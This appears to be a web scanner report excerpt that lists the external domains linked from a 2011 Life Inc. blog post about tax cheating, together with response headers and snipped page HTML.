                   <a href="http://www.msnbc.redacted/id/3303540/">Terms & Conditions</a>
...[SNIP]...
<li>
                   <a href="http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/">MSN Privacy</a>
...[SNIP]...
<li>
                   <a href="http://help.live.com/help.aspx?project=tou&mkt=en-us">Legal</a>
...[SNIP]...
<li>
                   <a href="http://www.msnbc.redacted/id/26613008/">Advertise</a>
...[SNIP]...
</div><link rel="stylesheet" type="text/css" href="http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css">
<script type="text/javascript" language="JavaScript">
...[SNIP]...

22.101. http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifeinc.todayshow.com
Path:	/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never

Issue detail

The page was loaded from a URL containing a query string:

http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never?gt1=43001

The response contains the following links to other domains:

http://add42162.newsvine.com/
http://agbroadhurst.newsvine.com/
http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://alice-mc.newsvine.com/
http://allison-linnmsnbc.newsvine.com/
http://ann1638814.newsvine.com/
http://astrocenter.astrology.redacted/
http://autos.redacted/
http://basedrum777.newsvine.com/
http://bday.newsvine.com/
http://becky2120568.newsvine.com/
http://benlam1.newsvine.com/
http://bertfw.newsvine.com/
http://bill-horin.newsvine.com/
http://billmarvell.newsvine.com/
http://bit.ly/gFYrpS
http://blog.penelopetrunk.com/
http://blogs.consumerreports.org/baby/
http://blogs.consumerreports.org/money/
http://blogs.wsj.com/juggle/
http://borsiaii.newsvine.com/
http://bucks.blogs.nytimes.com/
http://careers.redacted/
http://cathy15.newsvine.com/
http://consumerist.com/
http://cschick2317.newsvine.com/
http://curious-1.newsvine.com/
http://cygnus-x-1.newsvine.com/
http://dateline.msnbc.com/
http://dating.redacted/index.aspx?TrackingID=516163&BannerID=670268
http://debi-1314897.newsvine.com/
http://derek-brockman.newsvine.com/
http://dmc2990950.newsvine.com/
http://elmerharmon.newsvine.com/
http://fredevil.newsvine.com/
http://guylittle-1.newsvine.com/
http://hardball.msnbc.com/
http://haste502.newsvine.com/
http://help.live.com/help.aspx?project=tou&mkt=en-us
http://ideaguy2.newsvine.com/
http://ihatethegovt.newsvine.com/
http://jerry194283.newsvine.com/
http://jimhenigman.newsvine.com/
http://johnthefree.newsvine.com/
http://jpcyphers.newsvine.com/
http://jstoler4156.newsvine.com/
http://knightrider3.newsvine.com/
http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css
http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png
http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247
http://lib.newsvine.com/chrome/lifeinc/style.css?v=23247
http://lib.newsvine.com/chrome/todaymartinblog/style.css?v=23247
http://littleadv.newsvine.com/
http://local.redacted/gas-traffic.aspx
http://local.redacted/news.aspx
http://local.redacted/weather.aspx
http://log.newsvine.com/poke.gif?x=0|26&get=c5936478&rand=1914872294&do=todayshow.com&rf=http%3A%2F%2Fwww.redacted%2F&ad=68:68:279;44::;70:70:276;68:68:279;74:74:278
http://mikebrooks.newsvine.com/
http://mjweir.newsvine.com/
http://moms.today.com/
http://moneycentral.msn.com/detail/stock_quote
http://msk2877762.newsvine.com/
http://msn.whitepages.com/
http://msnbcmedia.redacted/i/MSNBC/SiteManagement/Newsletters/Assets/Photos/Facebook-icon2.gif
http://msnbcmedia.redacted/i/MSNBC/SiteManagement/Newsletters/Assets/Photos/Twitter-icon2.gif
http://msnbcmedia.redacted/i/MSNBC/SiteManagement/Newsletters/Assets/Photos/alert.gif
http://msnbcmedia.redacted/i/MSNBC/SiteManagement/Newsletters/Assets/Photos/sm-mail.png
http://mtp.msnbc.com/
http://my.redacted/
http://n-wentworth.newsvine.com/
http://nightly.msnbc.com/
http://norris.blogs.nytimes.com/
http://ohmy999999.newsvine.com/
http://onthejob.45things.com/
http://peteroid69.newsvine.com/
http://platform.twitter.com/widgets.js
http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/
http://rachel.msnbc.com/
http://realestate.redacted/
http://rick--ws--nc.newsvine.com/
http://roger-4.newsvine.com/
http://settersperch.newsvine.com/
http://smellyloretta.newsvine.com/
http://smmfdmh.newsvine.com/
http://smoss73.newsvine.com/
http://specials.redacted/alphabet.aspx
http://stevenkatz2.newsvine.com/
http://stretch291.newsvine.com/
http://sukdu.newsvine.com/
http://takethatback.newsvine.com/
http://teapartyfan.newsvine.com/
http://thelastword.msnbc.redacted/
http://thesenatehealth.newsvine.com/
http://today.msnbc.com/
http://today.msnbc.msn.com/
http://trudyp.newsvine.com/
http://trust2112.newsvine.com/
http://tv.msnbc.com/
http://twitter.com/alinnmsnbc
http://twitter.com/share
http://twitter.com/todaymoney
http://twitter.com/todaymoney/
http://twl.newsvine.com/
http://video.redacted/video.aspx?mkt=en-us&from=MSNHP
http://wonderwall.redacted/
http://www.bing.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.delish.com/
http://www.economist.com/blogs/freeexchange
http://www.everyblock.com/
http://www.evetahmincioglu.com/web/blog/
http://www.facebook.com/home.php?
http://www.facebook.com/pages/Today-Money/152222541478430
http://www.facebook.com/plugins/like.php?layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&href=http://www.facebook.com/pages/Today-Money/152222541478430
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never
http://www.facebook.com/todaymoney
http://www.hotmail.com/
http://www.redacted/
http://www.msnbc.redacted/
http://www.msnbc.redacted/html/HtmlSitemap0.html
http://www.msnbc.redacted/id/26613008/
http://www.msnbc.redacted/id/27365695/
http://www.msnbc.redacted/id/32027560
http://www.msnbc.redacted/id/32359544/
http://www.msnbc.redacted/id/3303511/
http://www.msnbc.redacted/id/3303540/
http://www.newsvine.com/
http://www.newsvine.com/_nv/cms/help/newUsers
http://www.newsvine.com/_nv/cms/info/privacyPolicy
http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247
http://www.polls.newsvine.com/_static/css/e2a5a79d215988ddb0f116d757365d6a810c2d2e.css?v=23247
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_static/js/d1e431bda25a167e695fb05acc6e0492371d9a89.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif
http://www.polls.newsvine.com/_vine/images/_/b_posting.gif
http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif
http://www.polls.newsvine.com/_vine/images/_/b_star.gif
http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif
http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif
http://www.polls.newsvine.com/_vine/images/__/spinner.gif
http://www.polls.newsvine.com/_vine/images/av/60x60/allison-linnmsnbc-846208182.jpg
http://www.polls.newsvine.com/_vine/images/users/500/allison-linnmsnbc/5940862.jpg
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://www.ritholtz.com/blog/
http://www.suddenlyfrugal.com/
http://www.treasury.gov/irsob/
http://www.treasury.gov/irsob/reports/2011/IRSOB%202010%20Taxpayer%20Attitude%20Survey.pdf
http://yankinyerchain.newsvine.com/
http://yellowpages.msn.com/
http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js
http://zarkon.newsvine.com/
http://zone.redacted/en-us/home
https://lib.newsvine.com/chrome/today/images/favicon.ico
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=109
Date: Sun, 30 Jan 2011 16:49:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 140208

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Life Inc. - Good Graph Fr
...[SNIP]...
<meta name="contentId" content="5936478" />
<link rel="shortcut icon" href="https://lib.newsvine.com/chrome/today/images/favicon.ico" type="image/x-icon" />
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://lifeinc.todayshow.com/_feeds/rss2/author" />
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/e2a5a79d215988ddb0f116d757365d6a810c2d2e.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/d1e431bda25a167e695fb05acc6e0492371d9a89.js?v=23247"></script>
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/todaymartinblog/style.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/lifeinc/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=c5936478&rand=1914872294&do=todayshow.com&rf=http%3A%2F%2Fwww.redacted%2F&ad=68:68:279;44::;70:70:276;68:68:279;74:74:278" alt="" width="0" height="0" /></div>
...[SNIP]...
<li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i1"><a href="http://autos.msn.com/">Autos</a>
...[SNIP]...
<li class="i2"><a href="http://my.redacted/">My MSN</a>
...[SNIP]...
<li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&from=MSNHP">Video</a>
...[SNIP]...
<li class="i4"><a href="http://careers.msn.com/">Careers & Jobs</a>
...[SNIP]...
<li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a>
...[SNIP]...
<li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i10"><a href="http://zone.redacted/en-us/home">Games</a>
...[SNIP]...
<li class="i11"><a href="http://realestate.redacted/">Real Estate</a>
...[SNIP]...
<li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a>
...[SNIP]...
<li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i15"><a href="http://yellowpages.redacted/">Yellow Pages</a>
...[SNIP]...
<li class="i16"><a href="http://local.msn.com/news.aspx">Local Edition</a>
...[SNIP]...
<li class="i17"><a href="http://local.msn.com/gas-traffic.aspx">Traffic</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="i21"><a href="http://specials.msn.com/alphabet.aspx">Full MSN Index</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i1">
               <a href="http://www.msnbc.redacted/" class="site-msnbc">msnbc.com</a>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
           <li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a>
...[SNIP]...
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i7 show-thelastword"><a href="http://thelastword.msnbc.redacted/">The Last Word</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a>
...[SNIP]...
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a>
...[SNIP]...
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a>
...[SNIP]...
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
</a><a href="http://today.msnbc.redacted/" class="homelink"></a>
...[SNIP]...
<br />Life Inc. is about how the economy is affecting you: your life, your job, your family, your finances, your spending. Check us out on <a href="http://www.facebook.com/pages/Today-Money/152222541478430">Facebook</a> or follow us on <a href="http://twitter.com/todaymoney">Twitter.</a>
...[SNIP]...
<li class="email_subscribe_option"><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png" width="19" height="18" alt="Icons Email"> Receive e-mail updates</a>
...[SNIP]...
</div><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted">change this</a>
...[SNIP]...
<div class="spinner hide"><img src="http://www.polls.newsvine.com/_vine/images/__/spinner.gif" width="16" height="16" alt="Loading" /> Saving...</div>
...[SNIP]...
<a href="http://lifeinc.todayshow.com/_feeds/rss2/author"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png" width="18" height="18" alt="Icons Feed"> Subscribe to RSS</a>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&href=http://www.facebook.com/pages/Today-Money/152222541478430" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:90px; height:20px"></iframe>
...[SNIP]...

<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
<div id="vine-inlinePhoto__5940862" data-contentId="5940862" class="inlinePhoto photo_landscape photo_align_block user_inline_photo" style="width:500px;"><img id="allison-linnmsnbc/5940862.jpg" src="http://www.polls.newsvine.com/_vine/images/users/500/allison-linnmsnbc/5940862.jpg" width="500" height="285" alt="" /><div class="photo_credit_container">
...[SNIP]...
<p>An <a target="_blank" href="http://www.treasury.gov/irsob/reports/2011/IRSOB%202010%20Taxpayer%20Attitude%20Survey.pdf">survey of 1,000 Americans</a>
...[SNIP]...
<p>Update: A reader points out that the study was done by the <a target="_blank" href="http://www.treasury.gov/irsob/">IRS Oversight Board</a>
...[SNIP]...
<span class="ocicon"><img src="http://msnbcmedia.redacted/i/MSNBC/SiteManagement/Newsletters/Assets/Photos/sm-mail.png" alt="Send idea"/></span>
...[SNIP]...
<span class="ocicon"><img src="http://msnbcmedia.redacted/i/MSNBC/SiteManagement/Newsletters/Assets/Photos/Facebook-icon2.gif" alt="Facebook" width="16" height="16"/></span> <a href="http://www.facebook.com/todaymoney">Follow us on Facebook</a>
...[SNIP]...
<span class="ocicon"><img src="http://msnbcmedia.redacted/i/MSNBC/SiteManagement/Newsletters/Assets/Photos/Twitter-icon2.gif" alt="Twitter" width="16" height="16"/></span> <a href="http://twitter.com/todaymoney/">Follow us on Twitter</a>
...[SNIP]...
<span class="ocicon"><img src="http://msnbcmedia.redacted/i/MSNBC/SiteManagement/Newsletters/Assets/Photos/alert.gif" alt="E-mail alerts" width="16" height="16"/></span> <a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted">Sign up for e-mail alerts</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="todaymoney" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never" data-Text="Good Graph Friday: What? Cheat on taxes? Never">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div class="normal"><a href="http://agbroadhurst.newsvine.com/">Arthur G. Broadhurst</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://BorsiaII.newsvine.com/">Borsia-II</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star2" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://smmfdmh.newsvine.com/">smmfdmh</a>
...[SNIP]...
<p>An <a target="_blank" href="http://www.treasury.gov/irsob/reports/2011/IRSOB%202010%20Taxpayer%20Attitude%20Survey.pdf">IRS survey of 1,000 Americans</a>
...[SNIP]...
<p>An <a target="_blank" href="http://www.treasury.gov/irsob/reports/2011/IRSOB%202010%20Taxpayer%20Attitude%20Survey.pdf">IRS survey of 1,000 Americans</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="nbc"><a href="http://allison-linnmsnbc.newsvine.com/">Allison Linn</a>
...[SNIP]...
<a href="#star3" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://smellyloretta.newsvine.com/">Gregorovich</a>
...[SNIP]...
<a href="#star4" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://cygnus-x-1.newsvine.com/">Cygnus_X-1</a>
...[SNIP]...
<a href="#star5" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://OhMy999999.newsvine.com/">OhMy999999</a>
...[SNIP]...
<p><a href="http://cygnus-x-1.newsvine.com/">Cygnus_X-1</a>
...[SNIP]...
<a href="#star6" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://peteroid69.newsvine.com/">Peteroid</a>
...[SNIP]...
<a href="#star7" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://IHATETHEGOVT.newsvine.com/">I HATE THE GOVT!!</a>
...[SNIP]...
<div class="normal"><a href="http://BorsiaII.newsvine.com/">Borsia-II</a>
...[SNIP]...
<div class="normal"><a href="http://alice-mc.newsvine.com/">Alice Mc</a>
...[SNIP]...
<div class="normal"><a href="http://curious-1.newsvine.com/">craig speakman</a>
...[SNIP]...
<div class="normal"><a href="http://elmerharmon.newsvine.com/">ELH-602027</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://Ann1638814.newsvine.com/">Ann-1638814</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star8" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://cschick2317.newsvine.com/">cschick2317</a>
...[SNIP]...
<div class="normal"><a href="http://stevenkatz2.newsvine.com/">Steven Katz</a>
...[SNIP]...
<div class="normal"><a href="http://Debi-1314897.newsvine.com/">Debi-1314897</a>
...[SNIP]...
<div class="normal"><a href="http://teapartyfan.newsvine.com/">tea-party-fan</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star9" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://rick--ws--nc.newsvine.com/">Rick, WS, NC</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://trust2112.newsvine.com/">Michael Coats</a>
...[SNIP]...
<div class="normal"><a href="http://DMC2990950.newsvine.com/">DMC-2990950</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://bill-horin.newsvine.com/">Bill Horin</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star10" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Becky2120568.newsvine.com/">Becky-2120568</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star11" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://knightrider3.newsvine.com/">knightrider-2370569</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star12" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://OhMy999999.newsvine.com/">OhMy999999</a>
...[SNIP]...
<div class="normal"><a href="http://thesenatehealth.newsvine.com/">keith n</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://sukdu.newsvine.com/">Sue-612917</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://fredevil.newsvine.com/">Fred Evil</a>
...[SNIP]...
<a href="#star13" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://OhMy999999.newsvine.com/">OhMy999999</a>
...[SNIP]...
<p><a href="http://sukdu.newsvine.com/">Sue-612917</a>
...[SNIP]...
<div class="normal"><a href="http://bday.newsvine.com/">Beth-440386</a>
...[SNIP]...
<div class="normal"><a href="http://OhMy999999.newsvine.com/">OhMy999999</a>
...[SNIP]...
<a href="#star14" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Takethatback.newsvine.com/">Take that back.</a>
...[SNIP]...
<div class="normal"><a href="http://smoss73.newsvine.com/">Pondering-1159100</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star15" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://guylittle-1.newsvine.com/">GuyLittle</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://fredevil.newsvine.com/">Fred Evil</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star16" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://mjweir.newsvine.com/">mj-1451595</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://stretch291.newsvine.com/">stretch291</a>
...[SNIP]...
<div class="normal"><a href="http://ideaguy2.newsvine.com/">Idea Guy</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star17" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://derek-brockman.newsvine.com/">Derek-908696</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
